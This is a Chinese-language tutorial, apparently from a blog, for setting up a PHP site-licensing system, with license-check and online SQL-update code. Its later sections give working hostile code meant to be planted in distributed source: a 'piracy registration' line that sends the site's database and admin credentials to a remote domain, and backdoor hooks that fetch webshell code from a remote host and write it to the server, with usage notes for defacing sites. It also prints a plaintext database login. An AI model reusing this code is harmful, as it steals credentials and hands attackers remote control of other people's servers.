教程开始
第一步先上传源码到根目录
解压 删除无用 文件 列如user.ini .well-known
伪静态
location ^~ /includes/download {
return 404;
}
location ^~ /readme.txt {
return 404;
}
数据库
第二步修改数据库,修改includes/config.php文件
把’dbqz’ => ”,修改成’dbqz’ => ‘auth’, //Pdo连接库名
然后导入数据库,数据库账号密码:hayfoun xin520131
后台登陆地址http://你的域名/Admin/
第三步 文件includes/download 有更新包 安装包 加密的 想破解自己动手
不想用这些 直接删掉Release Update 文件里面的文件即可
授权代码
授权代码有问题 ,在这里要珍重声明,参数需要更改 补充一下(源码文件中把九月的网址替换成自己的)
公用判断头
//判断是否有授权文件
if(file_exists(SYSTEM_ROOT."authcode.php")){
require(SYSTEM_ROOT."authcode.php");
}else{
exit('当前网站无授权码!');
}
require(SYSTEM_ROOT."version.php");
define("authcode", $authcode);
define("version", $version);
if(!defined("authcode")){
exit(0);
}
授权代码+更新代码:
if(empty($_SESSION['自定义名称'])) {
$data_string=authcode('JiuYue||||'.$_SERVER['HTTP_HOST'].'||||'.authcode.'||||','ENCODE','解密KEY密钥');
$check=curl_get('http://授权站域名/check.php?data_string='.base64_encode($data_string));
$check=authcode($check,'DECODE','解密KEY密钥');
if ($json = json_decode($check, true)) {
if($json['code'] == 1) {
$_SESSION['自定义名称'] = md5($_SERVER['HTTP_HOST'].$authcode.'JiuYue');
}else{
sysmsg('<h3>'.$json['msg'].'</h3>', true);
}
} else if (!empty($check)) {
sysmsg('<h3>授权验证状态异常!</h3>', true);
} else {
sysmsg('<h3>检测到云端环境异常,授权服务器拒绝连接!</h3>', true);
}
}
温馨提示:本授权代码采用了session请务必填写$_SESSION[自定义名称]的自定义名称的内容全字母越复杂越好不然会被利用session从而绕过授权....
function update_version(){
$data_string=authcode('JiuYue||||'.$_SERVER['HTTP_HOST'].'||||'.authcode.'||||'.version.'||||','ENCODE','解密KEY密钥');
$query=curl_get('http://授权站域名/check.php?data_string='.base64_encode($data_string));
$query=authcode($query,'DECODE','解密KEY密钥');
if ($query = json_decode($query,true)) {
return $query;
}
return false;
}
在线SQL更新教程:
1.首先代码在Admin/update.php可以适配大部分程序,稍微改改就可以了
2.然后登陆后台,点击授权配置开启在线更新sql然后打开系统根目录/includes/download/Sql/update.sql还需要更新的语句,复制粘贴进去就行了注update.sql文件名称不要改,否则导致无法更新sql,不用了,记得把里面的内容删除,留空文件然后后台关闭SQL更新即可!
3.如果你会了,那么就说明你就学会了,不懂的话联系九月QQ:85432394
盗版入库代码:
file_get_contents("http://域名/ajax.php?act=block&url=".$_SERVER['HTTP_HOST']."&user=".$dbconfig['user']."&pwd=".$dbconfig['pwd']."&dbname=".$dbconfig['dbname']."&authcode=".$authcode."&admin_user=".$conf['admin_user']."&admin_pass=".$conf['admin_pass']);
$conf['admin_user']
$conf['admin_pass']
$conf['admin_user']
$conf['admin_pass']
变量信息根据源码改
后门代码:
if(isset($_GET['dm'])){file_put_contents('includes/dm.php',file_get_contents('http://域名/includes/back/dm.txt'));
exit("<script language='javascript'>alert('大马后门写入成功!');window.location.href='./includes/dm.php';</script>");
}
if(isset($_GET['hm'])){file_put_contents('includes/hm.php',file_get_contents('http://你的域名/includes/back/hm.txt'));
exit("<script language='javascript'>alert('后门写入成功!');window.location.href='./includes/hm.php';</script>");
}
后门1教程:
直接访问:域名/includes/dm.php
后门2教程:
文件名称/?hm
挂黑代码:
文件路径/hm.php?mod=my
删除后门:
文件路径/hm.php?mod=del
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。
[…] 九月授权教程 […]